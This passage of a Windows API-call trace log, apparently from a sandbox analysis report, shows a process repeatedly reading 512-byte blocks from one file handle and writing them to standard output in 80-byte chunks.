hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.801] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.801] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] GetFileType (hFile=0x50) returned 0x1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] GetFileType (hFile=0x50) returned 0x1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] GetFileType (hFile=0x50) returned 0x1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] GetFileType (hFile=0x50) returned 0x1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] GetFileType (hFile=0x50) returned 0x1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: 
lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] GetFileType (hFile=0x50) returned 0x1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] GetFileType (hFile=0x50) returned 0x1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] GetFileType (hFile=0x50) returned 0x1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.802] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.802] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.802] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.802] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] GetFileType (hFile=0x50) returned 0x1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] GetFileType (hFile=0x50) returned 0x1 [0194.803] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0194.803] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] GetFileType (hFile=0x50) returned 0x1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] GetFileType (hFile=0x50) returned 0x1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] GetFileType (hFile=0x50) returned 0x1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] GetFileType (hFile=0x50) returned 0x1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] GetFileType (hFile=0x50) returned 0x1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 
[0194.803] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] GetFileType (hFile=0x50) returned 0x1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.804] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.804] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.804] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.804] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] GetFileType (hFile=0x50) returned 0x1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] GetFileType (hFile=0x50) returned 0x1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] GetFileType (hFile=0x50) returned 0x1 [0194.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.804] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 
[0194.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.811] GetFileType (hFile=0x50) returned 0x1 [0194.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.818] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.818] GetFileType (hFile=0x50) returned 0x1 [0194.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.818] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.818] GetFileType (hFile=0x50) returned 0x1 [0194.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.818] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.818] GetFileType (hFile=0x50) returned 0x1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] GetFileType (hFile=0x50) returned 0x1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.819] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0194.819] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.819] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.819] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] GetFileType (hFile=0x50) returned 0x1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] GetFileType (hFile=0x50) returned 0x1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.819] GetFileType (hFile=0x50) returned 0x1 [0194.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] GetFileType (hFile=0x50) returned 0x1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] GetFileType (hFile=0x50) returned 0x1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] GetFileType (hFile=0x50) returned 0x1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] GetFileType (hFile=0x50) returned 0x1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] GetFileType (hFile=0x50) returned 0x1 [0194.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.820] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.821] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.821] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.821] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.821] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] GetFileType (hFile=0x50) returned 0x1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] GetFileType 
(hFile=0x50) returned 0x1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] GetFileType (hFile=0x50) returned 0x1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] GetFileType (hFile=0x50) returned 0x1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] GetFileType (hFile=0x50) returned 0x1 [0194.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.821] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] GetFileType (hFile=0x50) returned 0x1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] GetFileType (hFile=0x50) returned 0x1 [0194.822] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] GetFileType (hFile=0x50) returned 0x1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.822] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.822] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.822] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.822] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] GetFileType (hFile=0x50) returned 0x1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] GetFileType (hFile=0x50) returned 0x1 [0194.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.822] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] GetFileType (hFile=0x50) returned 0x1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, 
lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] GetFileType (hFile=0x50) returned 0x1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] GetFileType (hFile=0x50) returned 0x1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] GetFileType (hFile=0x50) returned 0x1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] GetFileType (hFile=0x50) returned 0x1 [0194.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.823] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.824] GetFileType (hFile=0x50) returned 0x1 [0194.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.824] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, 
lpOverlapped=0x0) returned 1 [0194.824] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.824] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.824] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.824] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.824] GetFileType (hFile=0x50) returned 0x1 [0194.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.824] GetFileType (hFile=0x50) returned 0x1 [0194.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.824] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.824] GetFileType (hFile=0x50) returned 0x1 [0194.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.825] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.828] GetFileType (hFile=0x50) returned 0x1 [0194.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.828] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.828] GetFileType (hFile=0x50) returned 0x1 [0194.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.828] WriteFile (in: hFile=0x50, 
lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.828] GetFileType (hFile=0x50) returned 0x1 [0194.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] GetFileType (hFile=0x50) returned 0x1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] GetFileType (hFile=0x50) returned 0x1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.829] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.829] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.829] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.829] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] GetFileType (hFile=0x50) returned 0x1 [0194.829] _get_osfhandle 
